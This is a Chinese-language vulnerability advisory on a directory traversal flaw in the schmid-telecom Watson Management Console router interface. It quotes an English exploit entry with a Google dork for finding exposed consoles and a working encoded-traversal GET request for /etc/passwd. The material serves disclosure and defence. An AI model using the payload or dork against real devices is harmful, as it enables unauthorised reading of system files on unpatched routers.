发布日期:2013-01-10
更新日期:2013-01-13
受影响系统:
schmid-telecom Watson Management Console 4.11.2.G
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57237
Watson Management Console是SHDSL路由器 2P 8xEthernet桌面。
Watson Management Console存在目录遍历漏洞,此漏洞源于服务器没有正确验证用户提供的http请求,此漏洞可允许攻击者转义Web服务器根目录,并查看其中的可读文件。
<*来源:Dhruv Shah
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: Watson Management Console Directory Traversal Vulnerability
# Google Dork: allintitle:Watson Management Console
# Contacted Vendor : 17/12/2012 as well as 31/12/2012 The Vendor Did
Not Respond .
# Date: 1/2/2013
# Exploit Author: Dhruv Shah
# Vendor Homepage:
# Software Link: N/A
# Version: 441A800W0G (4.11.2.G)
# Platform:Hardware
Watson Management Console is a ( Watson SHDSL Router 2p 8xEthernet Tabletop )
It has been found that Watson Management Console is prone to a
directory traversal vulnerability. The issue is due to the server's
failure to properly validate user supplied http requests.
This issue may allow an attacker to escape the web server root
directory and view any web server readable files. Information acquired
by exploiting this issue may be used to aid further attacks against a
vulnerable system.
in burpsuite proxy or any proxy http request proxy that u use edit the
Request paramater to
GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
HTTP/1.1
--
Regards
Snypter a.k.a Dhruv Shah
建议:
--------------------------------------------------------------------------------
厂商补丁:
schmid-telecom
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: